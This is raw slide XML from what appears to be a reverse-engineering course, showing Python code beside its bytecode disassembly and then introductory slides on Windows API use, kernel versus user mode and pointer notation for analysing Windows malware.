                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="2349000"/>
            <a:ext cx="3141360" cy="201132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x = 1;</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y = 2;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>If x == y :</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>print("x equals y.\n");</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else:</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print("x is not equal to y.\n")</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428000" y="1412640"/>
            <a:ext cx="4270680" cy="499356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1           0 LOAD_CONST               0 (1)</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2 STORE_NAME               0 (x)</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2           4 LOAD_CONST               1 (2)</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6 STORE_NAME               1 (y)</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3           8 LOAD_NAME                0 (x)</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10 LOAD_NAME                1 (y)</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12 COMPARE_OP               2 (==)</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14 POP_JUMP_IF_FALSE       26</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4          16 LOAD_NAME                2 (print)</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18 LOAD_CONST               2 ('x equals y.\n')</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20 CALL_FUNCTION            1</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22 POP_TOP</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24 JUMP_FORWARD             8 (to 34)</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6     &gt;&gt;   26 LOAD_NAME                2 (print)</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28 LOAD_CONST               3 ('x is not equal to y.\n')</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30 CALL_FUNCTION            1</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32 POP_TOP</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&gt;&gt;   34 LOAD_CONST               4 (None)</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36 RETURN_VALUE</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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582"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i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> loop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644000" y="1628640"/>
            <a:ext cx="3451320" cy="371484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3           0 SETUP_LOOP              26 (to 28)</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2 LOAD_GLOBAL              0 (range)</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4 LOAD_CONST               1 (100)</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6 CALL_FUNCTION            1</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8 GET_ITER</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&gt;&gt;   10 FOR_ITER                14 (to 26)</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12 STORE_FAST               0 (i)</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4          14 LOAD_GLOBAL              1 (print)</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16 LOAD_CONST               2 ('i equals ')</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18 LOAD_FAST                0 (i)</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20 CALL_FUNCTION            2</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22 POP_TOP</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24 JUMP_ABSOLUTE           10</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&gt;&gt;   26 POP_BLOCK</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&gt;&gt;   28 LOAD_CONST               0 (None)</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30 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539640" y="2382120"/>
            <a:ext cx="2871000" cy="310860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def main():</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for i in range(100):</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print("i equals ", i);</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if __name__ == "__main__":</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main()</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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586"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String</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1761120"/>
            <a:ext cx="3274920" cy="3382920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent4"/>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import dis</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def myfunc():</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#string</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tmp_str=input("Enter string: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tmp_str = tmp_str[:-3]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tmp_str = tmp_str[-4:]</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print(tmp_str)</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if __name__ == '__main__':</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myfunc()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4125600" y="1196640"/>
            <a:ext cx="3780000" cy="5419800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>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12 LOAD_GLOBAL              0 (input)</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14 LOAD_CONST               2 ('Enter string: ')</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16 CALL_FUNCTION            1</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18 STORE_FAST               2 (tmp_str)</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8          20 LOAD_FAST                2 (tmp_str)</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22 LOAD_CONST               0 (None)</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24 LOAD_CONST               3 (-3)</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26 BUILD_SLICE              2</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28 BINARY_SUBSCR</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30 STORE_FAST               2 (tmp_str)</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9          32 LOAD_FAST                2 (tmp_str)</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34 LOAD_CONST               4 (-4)</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36 LOAD_CONST               0 (None)</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38 BUILD_SLICE              2</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40 BINARY_SUBSCR</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42 STORE_FAST               2 (tmp_str)</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10          44 LOAD_GLOBAL              1 (print)</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46 LOAD_FAST                2 (tmp_str)</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48 CALL_FUNCTION            1</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50 POP_TOP</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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590"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List</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1761120"/>
            <a:ext cx="3912120" cy="3108600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent4"/>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import dis</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def myfunc():</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mylist = ["apple", "banana", "cherry"]</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mylist.append("orange")</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list(mylist)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if __name__ == '__main__':</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myfunc()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788000" y="1761120"/>
            <a:ext cx="3374280" cy="4141080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>12        52 LOAD_CONST               5 ('apple')</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54 LOAD_CONST               6 ('banana')</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56 LOAD_CONST               7 ('cherry')</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58 BUILD_LIST                   3</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60 STORE_FAST                 3 (mylist)</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13       62 LOAD_FAST                   3 (mylist)</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64 LOAD_METHOD           2 (append)</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66 LOAD_CONST               8 ('orange')</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68 CALL_METHOD             1</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70 POP_TOP</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14       72 LOAD_GLOBAL              3 (list)</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74 LOAD_FAST                    3 (mylist)</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76 CALL_FUNCTION           1</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78 POP_TOP</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80 LOAD_CONST                0 (None)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>82 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>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Analyzing Malwares of Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594"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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Handles, File System functions, Special files</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Windows API &amp; Registry</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Windows API &amp; Networking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Bekerly socket, WinINET API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Existences of running malwares</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Thread, Process, Mutex, Service, COM, Exception</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Kernel &amp; User mode</a:t>
            </a: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5" name="Google Shape;1059;p106" descr="block diagram of user-mode and kernel-mode components"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204000" y="1905120"/>
            <a:ext cx="5740560" cy="4776120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596"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Kernel vs. User mode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="83000"/>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Windows has two processor privilege levels</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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kernel mode </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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user mode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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SYSENTER</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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SYSCALL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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INT 0x2E</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Kernel mode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Antivirus</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Firewall</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware (e.g.rootkit)</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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599"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A broad set of functionality that governs the way that malware interacts with the Microsoft libraries.</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Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Hungarian notation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="600" name="Google Shape;1068;p107" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611640" y="2709000"/>
            <a:ext cx="8164440" cy="4105800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602"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Long Pointer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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LP: win 32-bit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;1076;p108" descr="https://qph.fs.quoracdn.net/main-qimg-8e76a1fd7c71319addb3ee0c7d81b48f"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716000" y="2061000"/>
            <a:ext cx="2962080" cy="1942920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683640" y="2859480"/>
            <a:ext cx="3049560" cy="301788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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int *ptr</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT *ptr</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPDWORD* ptr</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT *ptr1, ptr2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT* ptr1, ptr2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT (*ptr) [50]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int *(*ptr)[50]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int (*ptr[2])[5]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860000" y="4725000"/>
            <a:ext cx="2720880" cy="228564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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (*ptr) = ????</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (ptr) = ?????</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
